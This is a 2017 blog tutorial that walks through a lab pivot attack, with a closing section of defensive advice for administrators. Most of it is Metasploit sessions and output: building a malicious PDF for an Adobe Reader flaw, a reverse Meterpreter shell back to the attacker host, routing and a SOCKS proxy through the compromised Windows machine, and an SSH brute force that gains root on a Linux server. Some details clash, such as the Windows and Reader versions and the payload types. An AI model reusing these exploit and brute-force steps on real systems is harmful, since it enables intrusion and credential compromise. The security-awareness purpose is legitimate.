Pivoting the target network

April 5, 2017 Network, Security

This article has the goal to improve the awareness about the risks of a pivot attack where the target system is exploited through another compromised system. The classic defense against these type of attacks based on the company’s perimeter is obsolete and it requires new solutions and approaches.

The systems are compromised generally by phishing attack forcing the user clicking to malicious url or opening an infected document. The technique to attack server through another compromised system is called pivoting and it’s showed here using metasploit already installed in Kali Linux. Recent attacks have followed this logic: https://www.us-cert.gov/ncas/alerts/TA17-117A.

The example proposed simulates a phishing attack delivering a malicious pdf that permits to take the control of infected system in order to be used as trojan horse for attacking a linux system by a ssh brute force.

The reference architecture is the following:

pivot network attack

Following the systems involved in the laboratory:

SO	Role	IP
Kali	Attacker	192.168.4.1
Windows 7 with Adobe Reader 7	System directly attacked	192.168.4.3
Linux	Back end system Centos 7.2 attacked.	192.168.3.4

Let’s start to explain how to organize the attack with Kali.

Metasploit in Kali

Kali System Operating will be used for attacking the windows client. The metasploit framework already installed in Kali is an exploit tool that contains a lot of well known exploits and shell code, called payload.

In this case a PDF file format-based exploit that triggers the vulnerability CVE 2010-2883 is used. This is a stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X: it allows remote attackers to execute arbitrary code (https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2883).

To exploit this vulnerability, I will creare a PDF file to send to victim that is a Windows XP client with Adobe Reader 9 installed. Following how to create the maliciuos pdf file with metasploit:

msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.4.1
LHOST => 192.168.4.1
msf exploit(adobe_cooltype_sing) > set LPORT 443
LPORT => 443
msf exploit(adobe_cooltype_sing) > show options
Module options (exploit/windows/fileformat/adobe_cooltype_sing):
Name Current Setting Required Description
—- ————— ——– ———–
FILENAME msf.pdf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.4.1 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
— —-
0 Automatic
msf exploit(adobe_cooltype_sing) > exploit
[*] Creating ‘msf.pdf’ file…
[+] msf.pdf stored at /root/.msf4/local/msf.pdf

The vulnerability is triggered when the pdf is opened. It executes a reverse tcp shell that creates a connection back to the attacker machine from victim system. The payload is injected directly in the space program of pdf process as dll and executed by thread by a approach called Reflective DLL Injection. The advantage of this solution is not to permit the system operating to register the dll loaded and hiding itself by antivirus checking.

For deeping how the meterpreter works, I suggest to read this article https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads.

A exploit handler is in listening for all the connections made from the shell code triggered from the exploit:

msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–
Exploit target:
Id Name
— —-
0 Wildcard Target
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.4.1
LHOST => 192.168.4.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler…

Now the pdf can be sent to victim. When it opens, the exploit handler will receive and manage the connection and a meterpreter session will be created::

msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler…
[*] 192.168.4.3:8372 Request received for /5VWz…
[*] 192.168.4.3:8372 Staging connection for target /5VWz received…
[*] Meterpreter session 1 opened (192.168.4.1:443 -> 192.168.4.3:8372) at 2017-05-01 23:06:42 +0200
meterpreter >
meterpreter >
meterpreter > sysinfo
Computer : Client
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : it_IT
Meterpreter : x86/win32
meterpreter >

The attacker has already taken control of victim system. The privileges of the meterpreter session are that of the user that opened the pdf. If the user belongs to Administrator groups, the privileges are that of Administrator but are limited by admin approval mode (UAC) that helps prevent malware from silently installing without an administrator’s knowledge. For having full controll of the system is needed a privilege escalation that is out of scope of this article.

For exploring the internal ip address where the client is connected, it’s enough to explore the arp table:

meterpreter > shell
Process 836 created.
Channel 1 created.
Microsoft Windows [Versione 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tutti i diritti riservati.
C:\Users\sys0>arp -a
nterfaccia: 192.168.3.1 — 0x1e
Indirizzo Internet Indirizzo fisico Tipo
192.168.3.4 08-00-27-bf-85-85 dinamico
192.168.3.255 ff-ff-ff-ff-ff-ff statico
224.0.0.2 01-00-5e-00-00-02 statico
224.0.0.22 01-00-5e-00-00-16 statico
224.0.0.251 01-00-5e-00-00-fb statico
224.0.0.252 01-00-5e-00-00-fc statico
239.255.255.250 01-00-5e-7f-ff-fa statico
255.255.255.255 ff-ff-ff-ff-ff-ff statico

We detected a possibile host to attack with 192.168.3.4 ip address. For detecting the services running on it, we need to perform a nmap and for doing that the windows system exploited should be used as proxy. This type of attack is called pivot.

For making a scan of the 192.168.3.4, a route to network 192.168.3.0/24 is added by metasploit. the route below forces the metasploit to route all the traffic to 192.168.3.0/24 to meterpreter session. The windows system works as a simple router.

meterpreter > background
[*] Backgrounding session 1…
msf exploit(handler) > route add 192.168.3.0 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
—— ——- ——-
192.168.3.0 255.255.255.0 Session 1
[*] There are currently no IPv6 routes defined

The next step is to install proxychain (apt-get install tor) that allows to run any program through HTTP or SOCKS proxy. The socks proxy is run in metasploit in this way:

msf exploit(handler) >use auxiliary/server/socks4a
msf exploit(handler) >set SRVPORT 9050
SRVPORT => 9050
msf exploit(handler) >run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server

A nmap is done by proxychain for detecting the open port on the 192.168.3.4 system. Proxychain is configured for proxying all the traffic to socks proxy listening on 9050 port.

The ssh port is open and it’s enough for a ssh brute force attack by metasploit using the ssh_login module. As user password file is used one of that present in Kali.

msf exploit(handler) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 192.168.3.4
RHOSTS => 192.168.3.4
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.168.3.4 yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf auxiliary(ssh_login) > exploit
[*] SSH – Starting bruteforce
[-] SSH – Failed: ‘root:’
[-] SSH – Failed: ‘root:!root’
[-] SSH – Failed: ‘root:Cisco’
[-] SSH – Failed: ‘root:NeXT’
[-] SSH – Failed: ‘root:QNX’
[-] SSH – Failed: ‘root:admin’
[+] SSH – Success: ‘root:attack‘ ‘uid=0(root) gid=0(root) groups=0(root) Linux linux.test.net 3.10.0-327.28.3.el7.x86_64 #1 SMP Thu Aug 18 19:05:49 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux ‘
[*] Command shell session 2 opened (?? -> 192.168.3.4:22) at 2017-05-02 15:41:00 +0200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

We found the root password of linux system. We can login via ssh by proxychain:

root@kali:~# more /etc/proxychains.conf |grep 9050
socks4 127.0.0.1 905
root@kali:~# proxychains ssh root@192.168.3.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:22-<><>-OK
root@192.168.3.4’s password:
Last failed login: Tue May 2 20:31:17 CEST 2017 from 192.168.3.1 on ssh:notty
There were 34 failed login attempts since the last successful login.
Last login: Tue May 2 15:02:26 2017
[root@linux-01 ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@linux-01 ~]#

We exploited the back end linux server. By this approach it’s possible to scan and try to exploit all the back end systems reachable from the first windows exploited.

Conclusion

In this article I showed how is possible to exploit the inside company services from a compromised windows system exploited by the preferred vector attack loved by hackers: phishing campaigns.

It’s very hard to avoid that the laptops and end company systems are exploited because no one is immune to open to some bad attach of a suspect mail or to visit some infected site apparently clean. The Antivirus always updated does not guarantes a good defense against the modern attack.

In this context, it’s necessary to have all the back end servers updated to lastet releases and configured in secure way. In our example the ssh server was not well configured: the ssh root login must be disabled and a fail2ban can be used for avoid ssh brute force login.

I hope to help system administrators to have aware about advanced modern attacks and to take the right countermeasures to minimize its impacts.

LEAVE A COMMENT Cancel reply

My Posts